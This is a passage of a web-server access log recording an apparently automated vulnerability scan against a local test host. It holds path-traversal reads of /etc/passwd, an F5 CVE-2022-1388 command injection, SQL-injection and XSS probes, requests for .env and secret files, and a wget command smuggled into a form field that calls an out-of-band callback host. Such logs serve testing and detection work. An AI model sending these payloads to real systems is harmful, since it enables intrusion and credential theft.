AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"{\x22id\x22:\x22insecure-firebase-database\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /29N5mARqLtnMaqyulkmhDIEZnHx.json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cp/Shares?user=&protocol=webaccess&v=2.3 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphiql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/data/usrimg/29n5m9dq7ceps7aivblfco4ud19.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/30 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dotAdmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/vpn.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_vti_inf.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/lifterlms/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5(8888)),1) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"{\x0D\x0A \x22command\x22: \x22run\x22,\x0D\x0A \x22utilCmdArgs\x22: \x22-c 'echo CVE-2022-1388 | rev'\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /mgmt/tm/util/bash HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /version.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfide/administrator/images/background.jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/prometheus HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /29N5mARqLtnMaqyulkmhDIEZnHx.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphiql/finland HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/31 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/initializers/secret_token.rb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/access.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"macAddress=112233445566%3Bwget+http%3A%2F%2Fca2u0eosmpv1jhs80ca0rjrwasyt4b99b.oast.fun%23®info=0&writeData=Submit","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /boardDataWW.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /files.md5 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /vkd/GetWelcomeScreen.event HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /data/pbootcms.db HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"{\x0D\x0A \x22command\x22: \x22run\x22,\x0D\x0A \x22utilCmdArgs\x22: \x22-c 'echo CVE-2022-1388 | rev'\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"localhost","request":"POST /mgmt/tm/util/bash HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"action=ucmm_mc_api&apiKey=-ca2u0eosmpv1jhs80ca03xu9a8398c7p5.oast.fun%2Ftest%2Ftest%2Ftest%3Fkey1%3Dval1%26dummy%3D","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CFIDE/administrator/images/componentutilslogin.jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /solr/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"__EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE=%C3%82%7B%7BVS%C3%82%7D%7D&__VIEWSTATEGENERATOR=%C3%82%7B%7BVSG%C3%82%7D%7D&__EVENTVALIDATION=%C3%82%7B%7BEV%C3%82%7D%7D&txtID=uname%27&txtPW=passwd&hdnClientDPI=96","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.dev HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/32 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=snippets&snippets-safe-mode%5B0%5D=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /home.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/warn.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"{{name}}=glpi&{{password}}=glpi&auth=local&submit=Submit&_glpi_csrf_token={{token}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /front/login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /testrail/files.md5 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?locale=en HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /owa/auth/x.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/data.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php?page=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/policy/category_table_ajax.php?customctid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql-console HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /te%3Cimg%20src=x%20onerror=alert(42)%3Est HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfide/administrator/images/componentutilslogin.jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:33 